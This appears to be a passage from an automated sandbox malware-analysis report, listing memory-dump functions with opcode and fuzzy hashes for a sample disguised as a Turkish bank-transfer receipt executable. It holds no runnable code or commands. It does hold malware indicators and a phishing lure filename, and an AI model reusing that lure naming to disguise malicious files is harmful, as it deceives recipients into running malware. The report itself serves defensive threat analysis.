Opcode ID: 902a025e1e66a6a2dbe641acbc6f22f98f3ba8f522a2cc1b9beb01429402e641
Instruction ID: 09d8fb23b520019b4c4883807dec68a79e8b00c4b7421febb6d5b538b157e581
Opcode Fuzzy Hash: 902a025e1e66a6a2dbe641acbc6f22f98f3ba8f522a2cc1b9beb01429402e641
Instruction Fuzzy Hash: F1C08C2060E2C00FDA2363B44AA07137F21C74FB50B010AD791458B9C7C6098E27C3E5

Function 06F054F0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5ec71a83596f42b64cc3857a58c4ea93ad44ce74bfc9e520ce239070512cff
Instruction ID: d2db1194de23ee8650823b3d9dc5359b54e2de2699e12094cbf6d444cabd1eac
Opcode Fuzzy Hash: 3a5ec71a83596f42b64cc3857a58c4ea93ad44ce74bfc9e520ce239070512cff
Instruction Fuzzy Hash: DCC08CB7C093803BD7104A20AA08B4B7A629BA5700F270869B2841A09086210C50E3A3

Function 06F01160 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aac4859ff6430e33cde7f25b20060a682296aa9f249a656e81928a5b2b30742
Instruction ID: d3901c9be61f28d48af2ae70fb2be7794b373d988c6c876546d62fa8dd7f2955
Opcode Fuzzy Hash: 4aac4859ff6430e33cde7f25b20060a682296aa9f249a656e81928a5b2b30742
Instruction Fuzzy Hash: 60C08CB8202200AFE3048B308848A2B7BE3EBD8301F01C428B2058A2A8CE308840CA60

Function 06FBC188 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c51b3f45df5211d6ab63f1fcb7b478a5838fc1962aeb3950d3f3c2aff24269
Instruction ID: 2947072950c8878600fe3ad0ea9c296f7723d12740ebcef7b009efb565d96203
Opcode Fuzzy Hash: 34c51b3f45df5211d6ab63f1fcb7b478a5838fc1962aeb3950d3f3c2aff24269
Instruction Fuzzy Hash: 90C04C6616E6C14DE24253355C219A12F611D2621971914E2C190660E3E4499257D6AA

Function 06FBB8EC Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7906463a2d5e2486ec450b36c7aa3d30fd2be584c86ec600031298d9e0e3760d
Instruction ID: 071fe0ba98f7c88152f967fa317db296c5b0a9009054c573dd901c05c00737e4
Opcode Fuzzy Hash: 7906463a2d5e2486ec450b36c7aa3d30fd2be584c86ec600031298d9e0e3760d
Instruction Fuzzy Hash: D3B01236198305A7718073638D98A7BB210ABB5706F44AC01B29A20050C8B1C4279537

Function 06FB6850 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Function 06F00C38 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2558b0175b78e527ff8963af64919706cc288476d054205bb6b3bc9a925a5a73
Instruction ID: 4f1c9674686744bdbd610022c7d5e9ca9555c37c7ffc59b522d4a45c8f0b1f12
Opcode Fuzzy Hash: 2558b0175b78e527ff8963af64919706cc288476d054205bb6b3bc9a925a5a73
Instruction Fuzzy Hash: A7B0123000070D4BC5017B55F805924371DDA8851474001A0A10C05016997569594A95

Function 06F005F0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a409ddb23cab2fe9e6c90388229498ef4a2e10abb5eda4e7086e2c40aeb491e
Instruction ID: a63d545642185107eb910f0b0d214d495f9b01001cd12d1169607f6bafa6adb2
Opcode Fuzzy Hash: 1a409ddb23cab2fe9e6c90388229498ef4a2e10abb5eda4e7086e2c40aeb491e
Instruction Fuzzy Hash: 85B0123606430887830057A8FC0A615739C66457343348358E13D4A2E1CE62B8128544

Function 06FB0E50 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3f5d0c90d9198ca1602f9565c9ecb4b0c6c81b8a4cc72890c5696ea4e03eea
Instruction ID: 5fd40d8011cf49fd2476d4dfa66a9f89aab0ce9aad9b4e9fe1235f4434c673fa
Opcode Fuzzy Hash: de3f5d0c90d9198ca1602f9565c9ecb4b0c6c81b8a4cc72890c5696ea4e03eea
Instruction Fuzzy Hash: 62C048305122408FEB068B20C0488007B62AB4220635940D8E0098A562CB369CC2CB10

Function 06FB92B6 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1efcec0787ea37de0d5d58705b2f83f895e2706f6f7d93b56274598d1f587d4
Instruction ID: 0b7e19b82f0af01ac4f32bb41526b18a563e6dcc7031cb91f660df2f78ace29f
Opcode Fuzzy Hash: d1efcec0787ea37de0d5d58705b2f83f895e2706f6f7d93b56274598d1f587d4
Instruction Fuzzy Hash: 59B0127152B58CCFFF074B58C1185402E2DCBF2310B0748AA9251CA1C1CE184A40C332

Function 06FBAB78 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6db49820229376febe976234782bf04e6151029db754951e2b81957d20c8616
Instruction ID: 880966fdb3c5f5957e7a748248c2da395254722afd8a3f0030a77b947e46ad1b
Opcode Fuzzy Hash: a6db49820229376febe976234782bf04e6151029db754951e2b81957d20c8616
Instruction Fuzzy Hash: 77A02238323200AFB380233820083282AA3E3C82203C002882283C23C8EC388C800A30

Function 06FBD0D0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c385f2cfd752ef88e5673f7043ea60462892ab469dc260ad0f996310bda8ebd
Instruction ID: 13c1d5c916ccce0e27bee22daf4f520d5854670df0066bc9ebef9c83237dceff
Opcode Fuzzy Hash: 1c385f2cfd752ef88e5673f7043ea60462892ab469dc260ad0f996310bda8ebd
Instruction Fuzzy Hash: D7A02238322F08CBAAC023B2000C3082AC2B3C80203E0CAC0A083C23C8CC3088828230

Non-executed Functions

Function 06F43628 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

%, xrefs: 06F43A1C

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 488a2642fc2ad68ef5df2fc81101f128522e236ed8b87198ff55e59fe32b7782
Instruction ID: 084ee76e88c6dfb206156be60344d13b8cfd145e347c095fae26bfa705be77cf
Opcode Fuzzy Hash: 488a2642fc2ad68ef5df2fc81101f128522e236ed8b87198ff55e59fe32b7782
Instruction Fuzzy Hash: CE026871B003089FEB58EFA5D845AAEBBB3FF88300F148429E6069B395DB35D945CB51

Function 06F45F10 Relevance: 1.3, Instructions: 1277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ef84975528df8e78ac333d21a4eff6311f33c039ddfe3bf04d7888416de8fb
Instruction ID: 5f135d17ed111b78ed39f704f0f7d1adcfa097d589e93c9d5ec5f423266547ce
Opcode Fuzzy Hash: b6ef84975528df8e78ac333d21a4eff6311f33c039ddfe3bf04d7888416de8fb
Instruction Fuzzy Hash: A4C20930A01219CFDB65EF64C954BADBBB2FF89301F1085A9E90A9B791DB319D81CF50

Function 06F4AFB8 Relevance: 1.1, Instructions: 1135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b1815fe5df1d96eb6eba984475975909c3a656e58a037c77d19302a0d9fbccc
Instruction ID: 44c5cffb7688bf533850cd89d2c64d8940e550e5b340ac74e851b6f02a940ce4
Opcode Fuzzy Hash: 3b1815fe5df1d96eb6eba984475975909c3a656e58a037c77d19302a0d9fbccc
Instruction Fuzzy Hash: 37A29D31A047058FDB65DF69D484A6AFBF2FF88310F158569E5469BB62CB30EC42CB90

Function 06F08DA8 Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c5e4802f3a257581279c0639bcd28f932d98b0c6acf06b32e90c30b046eb45
Instruction ID: 02948634da00b95c6bcb401aa021fa0445e32f03707381e558b6dda95a115226
Opcode Fuzzy Hash: f8c5e4802f3a257581279c0639bcd28f932d98b0c6acf06b32e90c30b046eb45
Instruction Fuzzy Hash: 8762EFB07003009BE748DF55D45971A7BE6EB88308F24C99CD10A9F392DBBBD90B9B95

Function 06F08DB8 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8fe324bd9094d2be8029c2c93731e374d38439ab0db9a9b8447f159ed354b6
Instruction ID: dac6775692e78f31fda1de3cfa64b32054002affd27f6fd3f389f388a85ba170
Opcode Fuzzy Hash: 9b8fe324bd9094d2be8029c2c93731e374d38439ab0db9a9b8447f159ed354b6
Instruction Fuzzy Hash: 9062E0B07003009BE748DF55D45971A7BE6EB88308F24C95CD10A9F392DBBBD90B9B95

Function 06F447CF Relevance: .6, Instructions: 638COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9061a33b125ad67a64280475a99fe8f4a7e74a2718a5f0afcd17aa76cf07eb
Instruction ID: 6321056cd08afc147555abf60344ab0c7f068158fda06c687851a2eb67db9745
Opcode Fuzzy Hash: cc9061a33b125ad67a64280475a99fe8f4a7e74a2718a5f0afcd17aa76cf07eb
Instruction Fuzzy Hash: A7428330A01341CFDB64EF65D58876ABBF6FF88315F148829E242DBA90DB35E885CB51

Function 06F4CAE0 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b1596f396c72ca062cfd8bea7d5f82eee9477be6d7c7ee10f55ea9004a6975
Instruction ID: 4dd48cd19a162a3778a878d7305443920d96f49b142a30ab858b10dc1cae3085
Opcode Fuzzy Hash: 11b1596f396c72ca062cfd8bea7d5f82eee9477be6d7c7ee10f55ea9004a6975
Instruction Fuzzy Hash: AE426A30B013449FDB59EF68C884A6EBBF2BF89300F148469E5169B7A1DB35ED41CB90

Function 06F08620 Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa40b634f97d84b398c4f64afae7fb04a8912a4c603893c6347065388aa70b8e
Instruction ID: 481ac6ecaa2aca282d55c120a097f50dcc497c5eca5182501bb4808ea95ac92d
Opcode Fuzzy Hash: fa40b634f97d84b398c4f64afae7fb04a8912a4c603893c6347065388aa70b8e
Instruction Fuzzy Hash: 0812BC71A003099FEF55DF68D880BAEBBF2BF88340F148569E515AB291DB30ED45DB90

Function 06F49628 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa9d6206a95fb5e63d27f8d5b1c7d2d86223ba408ab8a5a96912d2e83f65e98d
Instruction ID: bb12d756c537208c981463b9f0d660447b5c17b0dd8f792a7d71c649ca91f6c7
Opcode Fuzzy Hash: aa9d6206a95fb5e63d27f8d5b1c7d2d86223ba408ab8a5a96912d2e83f65e98d
Instruction Fuzzy Hash: 2BF16835E04705CFDBA5DF69C484AAABBF2BF88300F148969E45A9BB61C774E845CB40

Function 06F47340 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be91572e6998de86093e971b3ab9fcce3c1b87559175137b293c39728097293
Instruction ID: b5d2f1a85c92a4b8aa7bccdc74d4975f8e84ba8aefadd4b0b00e7e8fa264d722
Opcode Fuzzy Hash: 8be91572e6998de86093e971b3ab9fcce3c1b87559175137b293c39728097293
Instruction Fuzzy Hash: 97F14D74E003089FDB58EFA4D844AAEBBB2FF88300F148469E916AB395DB35DD45CB50

Function 088BC4B8 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb550e1b80668f9691c27c7ffc3a34ab1a812f6f02dc227b74a1673644cd659
Instruction ID: a4d05918e0624d870c94db4cf7c00bec75ce74da103eec5ea3f9c4f8a2fcb1ec
Opcode Fuzzy Hash: 9fb550e1b80668f9691c27c7ffc3a34ab1a812f6f02dc227b74a1673644cd659
Instruction Fuzzy Hash: BDD178306016048FEB29DB79C950BAEB7E7AFC9701F14846ED14ADB791DB38E901CB52

Function 088B4988 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87398f4f2d4cde0db929e1b551c1d0b0964e156934f0a148a92a3aa57bbb3924
Instruction ID: a4b92744cd835ad687053cecb6c47c55e9cbfb285af0e06a1d473893c7513b22
Opcode Fuzzy Hash: 87398f4f2d4cde0db929e1b551c1d0b0964e156934f0a148a92a3aa57bbb3924
Instruction Fuzzy Hash: 55E12774E002198FDB14DFA8C581AAEFBB2FF89305F248169D905AB356D731AD42CF64

Function 088B51F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a4cafa7e34e254736abde92235cfdf31604c7dc4fe2f6cbd2b7e4d20825fe1
Instruction ID: 983237554e23b52af92179b2197742a690e5cedda301cd2ba255f1641e755870
Opcode Fuzzy Hash: c6a4cafa7e34e254736abde92235cfdf31604c7dc4fe2f6cbd2b7e4d20825fe1
Instruction Fuzzy Hash: 07E1F874E002198FDB14DFA9C580AAEFBB2FF89305F248169D815AB356D731AD42CF64

Function 088B4DC0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5433b17f2e4ebb577f1ee2188d8c8da7c49682b573374424c0f80b763d9cc5df
Instruction ID: eb9f344fcc50674ce4b1a1c6cc372a995d017cffc615669e4c94c1c0330b18c5
Opcode Fuzzy Hash: 5433b17f2e4ebb577f1ee2188d8c8da7c49682b573374424c0f80b763d9cc5df
Instruction Fuzzy Hash: CDE12974E002198FDB14DFA8C581AAEFBB2FF89305F248169D815AB356D731AD42CF64

Function 088B6600 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65c3302ef05f35edc38de411f09c6433cb44cf484b0ef39c02eb4ab83d05125
Instruction ID: 1fa90fca030dd0735812acac58a540d8e960914a20ad69fd44a7fa8adb99bc37
Opcode Fuzzy Hash: b65c3302ef05f35edc38de411f09c6433cb44cf484b0ef39c02eb4ab83d05125
Instruction Fuzzy Hash: 5AE10B74E002198FDB14DFA9C580AAEFBB2FF89305F248169D415AB356D731AD42CF64

Function 088B6FB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8080d05294a3250718eca985a34a889f8c086e5725cfbe853b7afd06448df7dc
Instruction ID: 5c42028b604d6bf4812092dbbcbe112b9deec7daa9eff6e2722e782284109a80
Opcode Fuzzy Hash: 8080d05294a3250718eca985a34a889f8c086e5725cfbe853b7afd06448df7dc
Instruction Fuzzy Hash: E1E1FA74E002198FDB14DFA9C5809AEFBB2FF89305F248169D815AB356D731AD42CF64

Function 00F7E214 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1380080625.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6af9dcf3b4b79a7a7c46a664ecab3756fe06254879753ee9ca9558f83b71a6
Instruction ID: 187780cefa0ec4d9e2a4c6359f93e3f3bf826090300292f9fe37bb2d876dc75a
Opcode Fuzzy Hash: eb6af9dcf3b4b79a7a7c46a664ecab3756fe06254879753ee9ca9558f83b71a6
Instruction Fuzzy Hash: E5A16F32E002058FCF05DFB5C8405AEB7B6FF88300B1585BBE809AB266DB75E955DB81

Function 088B65F0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 102035c2f7e120995922fe08d30a1c8add0d1900160a765215749c33d250fc02
Instruction ID: a8bf4771aff9947c2d03f1b14eabf98f523f66b6a05120f639f45f12de862203
Opcode Fuzzy Hash: 102035c2f7e120995922fe08d30a1c8add0d1900160a765215749c33d250fc02
Instruction Fuzzy Hash: 13512674E002198FDB14DFA9C5819EEFBF2FF89201F248169D418A7316D731AA42CFA5

Function 088B6FA3 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388953093.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52808bb18adc385b1467b315ef472806ca283c36719ea1c39dca07148bb95ac
Instruction ID: 723087ed2ad56a9d2143156291f72248f1bfe405ca8cb5b194ab51c69dd73a15
Opcode Fuzzy Hash: c52808bb18adc385b1467b315ef472806ca283c36719ea1c39dca07148bb95ac
Instruction Fuzzy Hash: 6C51F974E002198FDB14DFA9C5819AEFBF2FF89305F248169D419A7316D7319A42CFA1

Analysis Process: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exePID: 7540, Parent PID: 7292COMMON

Executed Functions

Function 00FDA088 Relevance: .9, Instructions: 900COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f67e5c1a33692fc17c1127f5aa9cf97b1d487d3424e246f8ac534339c8629a
Instruction ID: 807650852c194c0437e7cfbd0cb72641c3c927242d084b7d1879c5d5e934751d
Opcode Fuzzy Hash: c9f67e5c1a33692fc17c1127f5aa9cf97b1d487d3424e246f8ac534339c8629a
Instruction Fuzzy Hash: 2582AD71A00209CFCB15CFA8C984AAEBBF2FF88310F19855AE4059B361D735ED41DB66

Function 00FD69A0 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14c61fc7d4a1e4f9c96628610c2da6e226282fcd1e25a70719fcf3b4fb0465f
Instruction ID: 0ed6f33aa57bd48231b4b534834b39c9910f311f4e63a7877e5bcd96b4464ef0
Opcode Fuzzy Hash: b14c61fc7d4a1e4f9c96628610c2da6e226282fcd1e25a70719fcf3b4fb0465f
Instruction Fuzzy Hash: BD127D70A002199FDB14DF69D894BAEBBB7FF88310F24812AE445EB395DB349D41DB90

Function 00FD6FC8 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3799065373.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fd0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccaeca08dd658f8db52af62be99e62610f120889ce7157acddff90f403e89aac
Instruction ID: 1dfcd98fd3673ac03c97e67760dc62ecb8bdc448c0e7222d4263731d1cff8ae4
Opcode Fuzzy Hash: ccaeca08dd658f8db52af62be99e62610f120889ce7157acddff90f403e89aac
Instruction Fuzzy Hash: AB028231A04219DFCB15DF68D884AAEBBB3BF49310F19805AE805AB361E735ED41EB51

Function 056B7B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_56b0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c9c567eb4473b0ee1c6a70787d27a60294ff090ab7baf390586330bfe578ad9
Instruction ID: f50fa8de5baecc64c3564b1b734f8c1267e5c240884538bbc0acf62cb1ec5857
Opcode Fuzzy Hash: 6c9c567eb4473b0ee1c6a70787d27a60294ff090ab7baf390586330bfe578ad9
Instruction Fuzzy Hash: B5E1CF74E01218CFEB24DFA5D984BDDBBB2BF89300F2081AAD409A7395DB755A85CF14

Function 056B8FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3805064342.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

